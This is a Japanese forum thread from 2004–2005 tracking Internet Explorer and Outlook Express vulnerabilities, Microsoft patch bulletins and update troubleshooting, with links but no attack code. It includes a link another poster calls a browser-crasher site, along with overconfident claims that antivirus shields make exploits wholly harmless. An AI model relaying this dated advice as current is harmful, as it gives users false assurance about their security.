このページの解説がいつも糞なのは、セキュリティソフトのシールドを有効にしていれば、
おそらく実行されるスクリプトコードに既に対応していて、ウィルスと判定してくれて実行などされないので、
全く実害が無いという事である。

みんながセキュリティソフト入れてれば、ね。

>>786
利用規約違反中ってなってる・・・

>>791
なんでも年齢と郵便番号を偽って登録してたそうな。
早く反省し終わって復帰ｷﾎﾞﾝﾇ

偽ってというか、
あんなサービスに正しい個人情報差し出す奴いるのか？

しかしいきなり消すかねえ。

有名サイトなので目をつけられたのか、あからさまに偽と確定できる
住所（「〒123-45 東京都東京市東京町1-1-1」みたいな実在しない
やつ）で登録してたからか。

はてな登録情報の住所追加、正しい情報登録のお願いについて
http://www.hatena.ne.jp/info/address

> 住所をご登録頂いていないユーザー様には、登録情報変更ページに
> て住所をご登録いただくまで、はてなをご利用頂けなくなります

ああ、登録してなかったんだな。たぶん。

そうまでして個人情報吸い上げようとするか。
何か新しい商売はじめるのかね。

>>795
それは来年1月からだろう。
いま見られなくなってるのはTakagiﾀﾝが自粛してプライベートモードにしてるだけだと思われ。

あのやり方だと氏名・住所の正確性は担保されないから、
＞他者の権利侵害などが行われている場合などに、仮名でユーザー登録を頂いている等の理由で書き込みを行った方の特定ができない
という理由は薄弱だよなぁ。

IEに新たなセキュリティ・ホール，WebページやHTMLメールを開くだけで被害を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041104/152149/
>デンマークSecuniaなどは11月2日，Internet Explorer（IE）6／6 SP1に
>見つかったセキュリティ・ホールを公表した。細工が施されたHTMLファイル
>（WebページやHTMLメール）を開くだけで，任意のプログラムを実行させ
>られる危険性がある。実際，セキュリティ・ホールを突くHTMLファイルが
>公開されている。IE 6に限らず，IEのコンポーネントを利用するメール・
>ソフトなども影響を受けるので要注意。なお，Windows XP SP2を適用して
>いる場合には影響を受けない。(ry

ホント他のOS用にもIE6SP2出してほしいよ
仕方がないから会社のWin2kでのWebブラウズは
当面Firefox使うことにした

IE6SP2(2K,ME,98用)激しくｷﾎﾞﾝﾇ

NT用ﾓﾅｰ

サード・パーティ製品で強化する「ブラウザ・セキュリティ」
http://itpro.nikkeibp.co.jp/members/NT/WinSecurity/20041025/1/
＞MicrosoftはIEの新版を，単独のソフトウエアとして提供しないと決めた。
＞その理由は，同社がIEをOSの不可分な要素と考えているからである。最新
＞のWindows XP Service Pack 2（SP2）では，OSの基礎となるセキュリティ
＞やIEなど，様々な構成要素に改良を加えた。Microsoftは，Windows 2000
＞とそれ以前のOSに対して，同様の改良品を提供する計画はない。

>801
日経はトラッキングクッキー拒否にしているから見られないや　まあいいか

>>802
/members/のページは、メンバー登録(無料)とcookieの両方必要。

Internet Explorer のセキュリティ上の問題 "クリックとスクロール" からコンピュータを保護する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;888534

IEのパッチ未公開セキュリティ・ホールを突くウイルスが出現
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041109/152325/

http://www.microsoft.com/japan/technet/security/bulletin/MS04-038.asp
＞影響を受けるコンポーネント :
（ｒｙ
＞Windows XP Service Pack 2 上の Internet Explorer 6
はWinXP-SP2上のIE＝IE6-SP2ってことなんだよな
今まで何でわからなかったんだよｗ＞漏れ　＆　注意つけとけよｗ＞ＭＳ
最初読んだ時無印IE6のことだと思っちまったじゃねーかｗ

漏れはOS違うから↑は関係ないんだけど、やっぱり確認用にWiindowsUpdate（or MBSA）する習慣はつけとかないとダメか・・・

ところでセキュリティサイト・ホームからリンクたどっていっても↓にたどりつけないのも漏れだけ？
http://www.microsoft.com/japan/technet/security/fixedhome.asp?TFrame=false

IEのIFrame欠陥を悪用する2番目のMyDoomが出現
http://www.itmedia.co.jp/enterprise/articles/0411/10/news038.html

>>806
リンクからはみつからないね。
「製品別更新プログラム一覧」でサイト内検索すると見つかるけど。

“巧妙な”フィッシングが出現，ポップアップでアドレス・バーを偽装
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041110/152412/

IE次期版はLonghornと一緒に出荷，タブ付きブラウジング機能を搭載
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20041117/3/

Microsoft Internet Explorer Two Vulnerabilities
http://secunia.com/advisories/13203/

SP2適用のIE6に画像ダウンロード詐称の脆弱性
http://www.itmedia.co.jp/enterprise/articles/0411/27/news004.html

>>811と同一
IEの「名前を付けて画像を保存」機能にセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041126/153135/

マイクロソフト、IE6の「Mshtml.dll」エラーに対する修正プログラムを配布
http://internet.watch.impress.co.jp/cda/news/2004/11/26/5550.html

===緊急===
MS04-040 - Internet Explorer 用の累積的なセキュリティ更新プログラム (889293)
http://go.microsoft.com/?linkid=1576712
概要
リモートでコードが実行される可能性のある Internet Explorer の脆弱性を
修正するセキュリティ更新プログラムが公開されました。

>>814
http://www.microsoft.com/japan/technet/security/bulletin/ms04-040.asp

>>814-815
>重要 : この累積的な更新プログラムは、マイクロソフト セキュリティ情報
>MS04-004http://www.microsoft.com/japan/technet/security/bulletin/ms04-004.asp
>または MS04-038http://www.microsoft.com/japan/technet/security/bulletin/ms04-038.asp
>のリリース以来、リリースされた修正プログラムを含まない場合もあります。
>MS04-004 または MS04-038 のリリース以来、マイクロソフトからまたはサポート プロバイダ
>から修正プログラムを受けたお客様は、この更新プログラムをインストールしないで下さい。
>この累積的な更新プログラムではなく、更新プログラム 889669
>http://www.microsoft.com/isapi/gosupport.asp?TARGET=/default.aspx?scid=kb;ja;889669
>を適用して下さい。
MS04-004 または MS04-038 のリリース以来修正プログラムを受けてなくても、
更新プログラム 889669を適用すれば( ﾟДﾟ)ｳﾏｰなのかな？

>>816
889669はMS04-040を含むロールアップだからいいんじゃない？
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=c74028e2-10c9-4edd-ad0a-36493677bff8


http://www.microsoft.com/japan/technet/security/bulletin/fq04-040.asp
＞MS04-004 以降にリリースされた Internet Explorer 用の修正プログラムは、その修正プログラムにより置き換えられるファイルが
＞このセキュリティ情報の「セキュリティ更新プログラムに関する情報」の欄に記載されている場合、削除されます。
（「累積的なセキュリティ更新プログラム」なんだから↑の「修正プログラム」はセキュリティ修正以外ということでいいんだよね？＞ＡＬＬ）


しかし889293はかなり前のDLLソースにパッチ当てたおかん

ていうか889669じゃないとセキュリティ修正以外のパッチでもトラブル覚悟ですぐ当てるタイプの人には不足（889293でも穴はふさがるけど）
＞更新プログラム 889669 には、セキュリティ更新プログラム 889293 (MS04-040) の提供後に作成された Internet Explorer 用修正プログラムのすべてが含まれています。

>>817-818
ありがとうございます。
889669逝ってみます。

IEのパッチが“緊急公開”，既に悪用されている危険なセキュリティ・ホールをふさぐ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041202/153376/

>>816-818
IE のセキュリティ アップデート MS04-040 (KB889293) を適用する際の注意
http://www.updatecorp.co.jp/products/support/updateexpert/uekb/uekb00000291.html

もう訳わからん。
常にこのページのパッチさえ当てとけばおっけ
みたいな分かりやすい形にしてくれ。
ごちゃごちゃ読んでられん。


で、質問なんだけど、
OEってHTML形式で送られてきてもテキスト形式で表示させてる限り無問題？

俺はメールの送信者をアルファベットで表記してるんだけど、
送信者に表示されるのが日本語の名前じゃないと
怖くて開かずに削除してしまう癖があるとおっしゃる方がおられます。
海外からウィルスよく来るので。
常にテキスト形式で表示させておけばいいんじゃないかと思うのだけど。

from
SUZUKI kenji <[email protected]>
を
鈴木賢治 <[email protected]>
にして欲しいらしい。

ヘッダに日本語混ぜたくない。
subjectは妥協してるけど。
いや昔のサーバーとかMUAの問題からじゃなくて単に好みでそうしてるんだけど。

無問題なんて言い切れるのは神様かただの莫迦だよ
だってMSだもの

　　　　　　　　　　　　みつを

>>822
無問題といいきれないが、少なくともテキスト表示にして
標準のブラウザをIE(コンポーネント使用ブラウザ含む)以外のブラウザ(FireFoxとかOperaとか)にしておけば、
かなりリスクは低減できると思う(さらにJavaScriptも無効に)。

そこまでしてOE使うなという意見もあるけど、いろんな事情で使わざるを得ない人もいるだろうから…

OE 使うのはやめとけ

SP2パッチあててFirefox　(Javaスクリプト無効)　導入汁

ファイアーウオールはKerio personal ファイアーウオールでMAXセキュに設定

ルーターは２重で完璧！！（要：ポート設定）

アンチウイルスソフトはノートンかKasperskyA-V導入


これだけで９割不正アクセス＆ウイルスに対して有効

やっぱコンポーネントの問題は逃れられないのか。

んで、さっきIE6を
アンインストール→インストールし直し
したんだけど、
Windows Updateで、なぜか823559だけ何度も表示される。
適用したはずなのに、再起動してもう一度行くとまた表示される。
パッチをダウンロードして保存してから実行してもダメ。
まぁこんなこともよくあるのでしょう・・・が、
ちょっと不安なので、バージョン合ってるか見て下さい。

Ver.6.0.2800.1106
更新バージョン ; SP1 ; Q889293 ; Q837009 ; q313829
（最後のだけなぜかQが小文字）

関係ないけどこのバージョン情報って何とかコピペ出来ないんだろうか。
そもそもなぜ出来ないようにしてあるのだろうか。

書き忘れ
OSは98seです。

>>825
ソフトよりユーザーの知識や意識の方が大事

>>826
このスレは初めてですが、同じ環境なので取り敢えず参考程度になれば・・・
スタート＞プログラム＞アクセサリ＞システムツール＞システム情報
のInternet Explorerを見ると、以下のようになっています。(コピーも出来ます)

バージョン    6.0.2800.1106IS
ビルド    62800.1106
プロダクト ID    *****-***-*******-*****
アプリケーションのパス    C:\Program Files\Internet Explorer
最終インストールの日付    16/07/24 15:56:35
言語    日本語
アクティブなプリンタ    Kyocera Mita KM-2070 KX,KM163097,***.***.*.*:lp
    
暗号強度    128 ビット
コンテンツ アドバイザ    無効
更新バージョン    ;SP1;q313829;Q822925;Q828750;Q824145;Q832894;Q837009;Q831167;Q823353;Q867801;Q833989;Q834707;Q889293;
Java VM バージョン    5.0.3810.0
IEAK インストール    する

IEの更新バージョンに 823559 は見あたりませんが、「Windows Q823559 のアップデート」
というのが、「アプリケーションの追加と削除」にリストアップされています。
これは、システム情報の W98.SE の所でも見られます。

ちなみに、IE5→5.5→6とバージョンアップしてきて、IEをアンインストールしたことはありません。

>>829
有り難う御座います！参考になりました。
そうか、システム情報か・・・

> バージョン 6.0.2800.1106IS
このISってのが謎です。
↓うちのはこんな感じです。

バージョン6.0.2800.1106
ビルド62800.1106
アプリケーションのパスC:\Program Files\Internet Explorer
最終インストールの日付04/12/08 13:32:51
言語日本語
暗号強度128 ビット
コンテンツ アドバイザ無効
更新バージョン;SP1;Q889293;Q837009;q313829;
Java VM バージョン5.0.3810.0
IEAK インストールしない

IEやFirefoxなどにポップアップ・ウインドウを“乗っ取られる”セキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041208/153638/

>>831
そこの
>Secuniaでは「信頼できるサイトを閲覧しているときには，信頼できないサイトを閲覧しない
>（Do not browse untrusted sites while browsing trusted sites）」ことを対策として挙げている。

の意味がいまいち分からんけど、やっぱ漏れが頭が悪いからかな？

>>832
作成者が分かってるサイトと一緒に、誰が作ってるのか分からないような変なサイト見るなって事。

「IEでしか読めないページ，Windowsでしか使えないシステムは不適」，経産省が調達ガイドライン作成へ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041210/153722/

Outlook Express 6 Sevice Pack 1 の累積的な更新プログラム（KB887797)
なるものがWindowsUpdateに来ている。詳細不明。

× Sevice Pack 1
○ Service Pack 1
逝ってきます…

>>836
ああ、835だった。834氏ｽﾏｿ本当に逝ってきます。

KB887797は、Knowledge Baseもまだ用意されてないね。
しばらく様子見。

http://www.microsoft.com/downloads/results.aspx?productID=&freetext=KB887797&DisplayLang=en
Knowledge Base Article
http://go.microsoft.com/fwlink/?LinkId=38306　(これから用意するつもりらしい）

>>838
http://www.microsoft.com/downloads/details.aspx?FamilyID=785c35bb-0f03-4f2d-9e1c-66c9934b4610&DisplayLang=en
＞Supported Operating Systems: Windows XP Service Pack 2


「まさかSP2でエンバグﾞしちゃったわけないよね？なにしろ名前にセキュリティ強化機能搭載ってつけたぐらいだし。」
嫌味ったらしく小１時間（ｒｙしたい＞MS

Outlook Express 6 Service Pack 1 用の累積的な更新プログラム (KB887797)
このセキュリティに関連しない更新プログラムによって、Outlook Express のさまざまな問題が解決されます。

デスクトップに ~ というファイルが作成されるのが無くなったかも。

KB887797ぐぐっても昨日は0件だったが、今日は684件になってる(・∀・)
でも、めぼしい情報はなさげ（;´Д｀）

>>841
http://www.microsoft.com/downloads/results.aspx?freetext=887797&productID=&DisplayEnglishAlso=on&DisplayLang=ja
OE SP2は「Windows XP 用 Outlook Express」と言い張ることになったらしいｗ
てことはIE SP2も日本語情報では「Windows XP 用 Internet Explorer」になるのかな
ある意味正しいしわかりやすくて(・∀・)ｲｲ!!けど

887797は↓の修正パッチがWindowsUpdateにも北ということでいい？>ALL
http://support.microsoft.com/default.aspx?scid=kb;ja;843555
oO（なんで今？）

>>842
そだね。http://support.microsoft.com/default.aspx?scid=kb;ja;843555の修正だね。
やっとhttp://support.microsoft.com/kb/887797が公開された。

KB887797適用上の注意点は、
＞ノート この最新版がウインドウズ・アッデート・ウェブサイト上であなたに利用可能になる前に、
＞次のマイクロソフト知識基礎記事に記述される最新版をインストールしなければなりません。
＞823353 MS04-018:アウトルック・エキスプレスのための累積的なセキュリティ最新版
＞http://support.microsoft.com/kb/823353

>>842-843
Outlook Expressに「BCC」を表示する新たな不具合，MSはパッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041216/153984/
>米Microsoftは米国時間12月16日，同社のメール・ソフト「Outlook Express」に
>見つかった不具合を公表した。メールの送信者が「BCC（Blind Carbon Copy）」
>欄に記入したアドレスを，受信者すべてに見られる可能性がある。同様の不具合は
>2004年8月に見つかっているhttp://support.microsoft.com/kb/843555が，
>今回公表されたのは別の不具合である（関連記事http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040825/149044/）。
>同社では，この不具合を修正するための更新プログラム（パッチ）を公開した。
>同パッチを適用すれば，2004年8月の不具合を含む，いくつかの不具合も修正できる。

>>844
別のなんだー





ところで日本語KBで機械翻訳のやつはいつも決まり文句も変だよね
翻訳エンジンにお約束用語は入ってないのかと（ｒｙ
結局わかんないところは英語情報見るっちゅーねん

IEにクロスサイト・スクリプティング攻撃を許すぜい弱性，ページ偽装やCookie盗難の危険
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041217/154040/

>844
分割送信時のみの危険ということだな。分割送信のチェックだけまずは
チェックオフを確認して、IEのSP待つとしよう。

>>847
残念
＞今回の不具合は，メールを分割しなくてもBCCのアドレスを本文中に表示してしまうというもの。







しかしSP2になっても相変わらずグダグダだｗ
>>846＆http://pc5.2ch.net/test/read.cgi/sec/1060956936/754

>848
ああ読み違えた。ありがと。当てました。

不具合をこっそりと直して知らん振りを決め込むのは、企業として何処でもやっている当たり前の行為だ。
大企業としてまず率先して情報公開に貢献してもらいたいものだ。

Microsoftはかなり貢献してると思うけど。マジで

IEにフィッシングの危険――ActiveXに問題
Microsoftは、複数のセキュリティ関連企業から指摘された、
Internet Explorer 6の脆弱性について、調査を進めていると明らかにした。
http://www.itmedia.co.jp/enterprise/articles/0412/20/news009.html

(´-`).｡oO(信頼できるサイトを除いて、Internet Explorerで閲覧しないことだね…)

[Full-Disclosure] Internet Explorer FTP client can be used to send mail
http://lists.netsys.com/pipermail/full-disclosure/2004-December/030229.html

安全という嘘をつくにはさらに嘘をつかねばならない。

独占企業と訴えられないようにAppleを生かしておかねばならない。

Microsoft Internet Explorer XP SP2 Fully Automated Remote Compromise
http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm

俺自身の脆弱性が問題だ

>>856
何でもクリックしてしまう悲しい性とか？

正解。

┐(´ー｀)┌

IEのFTP機能にセキュリティ・ホール，任意のファイルをダウンロードさせられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050105/154424/
http://secunia.com/advisories/13704/

>>860
IE6SP1以前はもうだめかなぁ

XP-SP2に汁（なかったらXPまともに動くPC買え）ってことか・・・

HTML ヘルプの脆弱性により、コードが実行される (890175) (MS05-001)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-001.asp
カーソルおよびアイコンのフォーマットの処理の脆弱性により、リモートでコードが実行される (891711) (MS05-002)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-002.asp
インデックス サービスの脆弱性により、コードが実行される (871250) (MS05-003)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-003.asp

Windowsの修正パッチが3件公開，既知の危険なセキュリティ・ホールをふさぐ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050112/154606/
1月のWindowsアップデート、HTMLヘルプの脆弱性などに対処
http://www.itmedia.co.jp/enterprise/articles/0501/12/news007.html
マイクロソフト、「緊急」レベルのWindowsパッチをリリースへ
http://japan.cnet.com/news/sec/story/0,2000050480,20079963,00.htm
------------------------------------------------------------------
IE 6の脆弱性、最高レベルの深刻度に--セキュリティ対策企業が評価引き上げ
http://japan.cnet.com/news/sec/story/0,2000050480,20079962,00.htm

IEのパッチ未公開セキュリティ・ホールを再警告，デモ・ページも公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050111/154582/

まさかセキュリティ情報一覧をセキュリティ情報検索（自動ですべて）と合体しちゃうとは思わなかったー
一覧画面から情報の最終更新日わかんないyo
初めて出た日付なんてどうでもいいんじゃ　いっつも後から大事な情報出してくるじゃん　ヴォケ−
そんなに釣った魚にリソース割り当てたくないのかよ(´･ω･｀)ｼｮﾎﾞｰﾝ

>>861 XP SP2もだめぽ。
XP SP2のIEにセキュリティ・ホール，警告なしにファイルをダウンロードさせられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050117/154841/

>>864
なんか使いにくくなったね。

>>865
そのExploit-Codeが出回る頃には、セキュリティソフトベンダーが
ウィルスとして対応するので、常駐シールドしていればそのような事にはなりませんから
見た人は勘違いしない事。

>>865-866
ベンダーが対応するまでは、怪しいサイトによく行く人は用心汁。
複数の種類のブラウザを用途によって使い分けるのも吉。

［WSJ］ MSの無料スパイウェア対策ソフトを推奨できない理由
http://www.itmedia.co.jp/enterprise/articles/0501/17/news085.html

MSセキュリティ　ホーム　から
tp://www.microsoft.com/japan/technet/security/bulletin/ms05-003.asp

MSセキュリティ情報検索（元一覧ページ）　から
tp://www.microsoft.com/japan/technet/security/Bulletin/MS05-003.asp

（05-003はただの例）
同じところなのに大文字と小文字違いで一度飛んだリンクも紫にさせない意味わけわかめ
意味なんてないのかも？？？

メーラーはOutｌｏｏｋ以外を使う
ブラウザはＩＥ以外を使う

これだけでセキュリティレベルが上がる

Windowsのセキュリティ問題、最新パッチでは修正されず
http://japan.cnet.com/news/sec/story/0,2000050480,20080243,00.htm

http://pc.watch.impress.co.jp/docs/2005/0128/ms.htm
クライアント部門は営業利益率78%・・・ピークよりはsageてるね

Outlook Express で ASCII 文字以外の文字を使用すると本文が切れてしまう
http://support.microsoft.com/default.aspx?scid=kb;ja;893197

概要:Outlook Express 6 Service Pack 2 において ASCII 文字以外の文字を使用してメールを作成し、
送信トレイに一度保存した後、 再度送信トレイを開くと、作成したメールが途中から切れて削除されて
しまう場合があります。
解決方法:この問題を解決するには、Windows Update Web サイトから
[KB:887797 Windows 用 Outlook Express の更新プログラム] の更新プログラムを入手します。
http://windowsupdate.microsoft.com/

2月のマイクロソフト月例セキュリティ修正は13件も，「緊急」が非常に多い
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050204/2/

>>874
いよいよ明日ですね

Internet Explorer 用の累積的なセキュリティ更新プログラム (867282) (MS05-014)
公開日: 2005年2月9日 | 最終更新日: 2005年2月9日
http://www.microsoft.com/japan/technet/security/bulletin/ms05-014.mspx

>>876
＞重要: 以前に適用した修正プログラムまたは、更新プログラムのロールアップを使用している環境には、本セキュリティ更新プログラムを適用してはいけません。
＞「よく寄せられる質問」をご覧いただき、適切な更新プログラムのロールアップを適用してください。
「いけません」ってめちゃx2誤解させる書き方だよな

これって結局
「電話で修正プログラム手に入れてもない＆IEロールアップあてたことない香具師にはどーでもいー話だけど
関係ある環境は11月以降のIEロールアップあたってるならこのパッチだけで面倒見てやるけど
あたってない環境だとインストーラ的にアウトなんで11月（か12月）IEロールアップあててからこのパッチもあてれ」
だよね？

だったらパッチ・インストーラ作り直そうyoって思ったの漏れだけ？





ふー　大漁パッチあてやっとｵﾜﾀ
フレーフレー（としかいいようがないけど）＞いろんな動作（ｒｙしなきゃ／もう始めてるよの中の人

Windowsなどに危険なセキュリティ・ホールが多数，早急にパッチの適用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050209/155909/

http://www.itmedia.co.jp/enterprise/articles/0502/09/news080.html
＞OSのメンテナンスにリソースを割くことではないはずです。
・・・この言葉だけは正し杉・・・言う相手はともかく

>>877
IE のアップデート MS05-014 (KB867282) を適用する際の注意
http://www.updatecorp.co.jp/products/support/updateexpert/uekb/uekb00000296.html

米Microsoftがセキュリティ強化ロードマップ，IE 7.0のベータをXP SP2向けに今夏リリース
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20050216/156231/

いじわるしないで他のOS向けにも出すべきだよ。

IE 7だけではない、MSのセキュリティ強化策
http://www.itmedia.co.jp/news/articles/0502/16/news044.html
＞従来ほど大きなファイルをダウンロードしなくて済む、新しいパッチの配信を急いでいる
大きいって感じないんだけどなー
集中が問題とかか？

881のリンクじゃないや

[Full-Disclosure] IE/OE Restricted Zone Status Bar Spoofing
http://lists.netsys.com/pipermail/full-disclosure/2005-February/031773.html

XP SP2のIE 6にタイトルバーを偽装される脆弱性、フィッシング詐欺も懸念
http://internet.watch.impress.co.jp/cda/news/2005/02/22/6538.html

Windows Update ｷﾀ─wwﾍ√ﾚvv~(ﾟ∀ﾟ)─wwﾍ√ﾚvv~─!!!!!!

Double-byte character set (DBCS) characters may appear corrupted in
Internet Explorer on Windows XP when you browse a Web site that uses
Shift-JIS character encoding(KB886677)
http://support.microsoft.com/kb/886677
You receive the Stop error "Stop 0x05 (INVALID_PROCESS_ATTACH_ATTEMPT)"
in Windows XP Service Pack 2 or Windows Server 2003(KB887742)
http://support.microsoft.com/kb/887742

>>886
マイクロソフト，XP SP2用の重要なパッチをWindows Updateで公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050223/156582/
>パッチ自体は2004年中に同社のWebサイトで公開されていたが，今回Windows Updateでも公開された。
>重要なパッチなので，XP SP2用ユーザーは適用しておきたい。

MS、XP SP2向け2種類の更新プログラムをWindows Update経由で公開
http://www.itmedia.co.jp/enterprise/articles/0502/23/news085.html

たまたまとられた

Blogがやばい――スパイウェアの配布に悪用される脆弱性あり
http://www.itmedia.co.jp/news/articles/0502/24/news045.html
＞セキュリティ専門家らによると、この問題が影響するのは、
＞MicrosoftのInternet Explorer（IE）ユーザーがセキュリティ設定を最高にしていない場合だけだという。

>>886-888の日本語？
Windows XP 上の Internet Explorer で Shift-JIS 文字エンコードを使用する Web サイトを参照すると、2 バイト文字セット (DBCS) 文字が正しく表示されない場合がある
http://support.microsoft.com/kb/886677/ja
Windows XP Service Pack 2 または Windows Server 2003 で Stop エラー "Stop 0x05 (INVALID_PROCESS_ATTACH_ATTEMPT)" が表示される
http://support.microsoft.com/kb/887742/ja

>>890
scriptだけでどうやって感染するのか書いてないな。
内容がはしょられすぎ

IEにこんな裏技あるのね。ちょっとスレ違いだけど・・・
>常駐させなくても（・∀・）ｲｲ!! SpywareBlaster 5
>>>718
>そんなにスパイウェアが心配ならこの辺も熟読しておこう。
>
>【総合】スパイウェア予防駆除 Part6
>http://pc5.2ch.net/test/read.cgi/sec/1108613740/19-53
>
>IEのステータスバーをWクリック→インターネットゾーンを「高」
>
>見慣れないサイトを見る時にこうする癖をつければ、まず感染することはない。

>>892
そんな手口いきなり詳しく書いちゃかえってまずいじゃん

>>894
どうよんでも、どこがウイルスなのかわからん。
増殖は不可能だろ？

IE 7.0はタブ付きブラウジング機能を搭載
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050228/3/

タイピングの速さに自信がある諸君
ここの250点という怪記録を越えることができるかな
ttp://freegame.sytes.net/~take/cgi-bin/typecreate/index.html

>>897
ブラクラサイト

IE 7.0はWindows 2003 SP1とXP x64向けにも開発，Outlook Expressの新版はなし
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050307/2/

Windows 2000 SP4向けにも頼むＹＯ orz

なければないでちょっと不安になってくるのは気のせいかｗ

＞　2005 年 3 月 8 日 (米国日付)、マイクロソフト セキュリティ レスポンス センターは、新しいセキュリティ情報をリリースする予定はありません。
http://www.microsoft.com/japan/technet/security/bulletin/advance.mspx

フリー・ソフトでIEを強化しよう
http://itpro.nikkeibp.co.jp/free/NT/WinColumn/20050314/1/

セキュリティで保護された Web サイトに接続すると Internet Explorer 6 SP1 が応答を停止することがある
http://support.microsoft.com/default.aspx?scid=kb;ja;842607

リンクをクリックすると文字のサイズが中に戻る
http://support.microsoft.com/default.aspx?scid=kb;ja;896315

>>902-903
タイトルに[IE]〜付けるのやめたのか
あれ（これは見なくていいや）一目でわかりやすかったのにね

マイクロソフト：「Windows用パッチに脆弱性あり」
http://japan.cnet.com/news/sec/story/0,2000050480,20082248,00.htm
>Microsoftは、1月にリリースしたWindows 98/ME用のセキュリティパッチに欠陥があり、
>これらのオペレーティングシステム（OS）が動作するシステムが攻撃を受けるおそれがあることを認めた。

>>905
記事中には「1月に出た」MS05-002とあるが、Windows 98/ME用MS05-002パッチは3/9にリリースされている。
参考：KB891711不具合報告
緊急！　WindowsUpdateをしましょう！
http://pc8.2ch.net/test/read.cgi/sec/1060956936/919-

米eEyeがIEやOutlookのセキュリティ・ホールを発見，詳細については未公表
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050404/158433/

>>907
なんだかすっきりしないな。
さんざんチン●をしごかれた後に放り出されたような…

4月の月例パッチは“緊急”を含む8件、ウイルス駆除ツールも更新
http://internet.watch.impress.co.jp/cda/news/2005/04/08/7193.html
＞米国時間の12日

いつものことだけど日本だと水曜日ですね　ｳｷｳｷ（はしないか）

【緊急】
MS05-019 - TCP/IP の脆弱性により、リモートでコードが実行され、サービス拒否が起こる (893066)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-019.mspx
【緊急】
MS05-020 - Internet Explorer 用の累積的なセキュリティ更新プログラム (890923)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-020.mspx
【緊急】
MS05-021 - Exchange Server の脆弱性により、リモートでコードが実行される (894549)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-021.mspx
【緊急】
　MS05-022 - MSN Messenger の脆弱性により、リモートでコードが実行される (896597)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-022.mspx
【緊急】
　MS05-23 - Microsoft Word の脆弱性により、リモートでコードが実行される(890169)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-023.mspx
【重要】
MS05-016 - Windows シェルの脆弱性により、リモートでコードが実行される (893086)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-016.mspx
【重要】
MS05-017 - メッセージ キューの脆弱性により、コードが実行される(892944)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-017.mspx
【重要】
MS05-018 - Windows Kernel の脆弱性により、特権の昇格およびサービス拒否がおこる (890859)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-018.mspx

【緊急】
カーソルおよびアイコンのフォーマットの処理の脆弱性により、リモートでコードが実行される (891711) (MS05-002)
セキュリティ情報 MS05-002 を更新しました。
Windows 98、Windows 98 Second Edition および Windows Millennium Edition 用
の新しいセキュリティ更新プログラムが利用可能になりました。
既に公開済みの他の OS 用の更新プログラムに変更はありません。
http://www.microsoft.com/japan/technet/security/bulletin/MS05-002.mspx

↑不具合情報のあった98,98SE,ME用の891711修正パッチのの修正版ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!

【緊急】
PNG 処理の脆弱性により、バッファオーバーランが起こる (890261) (MS05-009)
　Microsoft Windows Messenger version 4.7.0.2009 (Windows XP Service Pack 1 で実行されている場合) 用
　の更新パッケージが利用可能になりました。
http://www.microsoft.com/japan/technet/security/bulletin/MS05-009.mspx

WindowsやIE，Oracleのセキュリティ・ホールを突くコードがさっそく出回る
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050414/159277/

深刻度格付けは確か「情報初公開時の」だったはずだから
その時点では攻撃コードがないってことで「重要」になってても
パッチを逆アセンブルされるのかすぐ実質「緊急」クラスに昇格することが多いな

知られてないセキュリティホールのパッチは確かに考えもんだわ
そんな言い訳でもう攻撃コードあるのまで放置されそうだけどｗ

Microsoft UpdateとWSUSは6月にリリースの予定
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050421/1/

>>914
そりゃそうだろうよ
おりゃ、無印のXPが発売された時に、
こりゃSP1になるまでは使い物にならないと判断して、
SP1が発売されるまで買わなかったもんね。

米eEyeがIEなどのセキュリティ・ホールを再び発見，深刻度は「高」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050509/160520/

「Web の表示」の脆弱性により、リモートでコードが実行される (894320) (MS05-024)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-024.mspx
最大深刻度 : 重要

>>917
○影響を受けるソフトウェア :
Microsoft Windows 2000 Service Pack 3 および Microsoft Windows 2000 Service Pack 4
※Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、Microsoft Windows Millennium Edition (ME)
　※「緊急」以外のセキュリティ問題のための更新プログラムは提供されません。
○影響を受けないソフトウェア :
Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 および Windows Server 2003 Service Pack 1
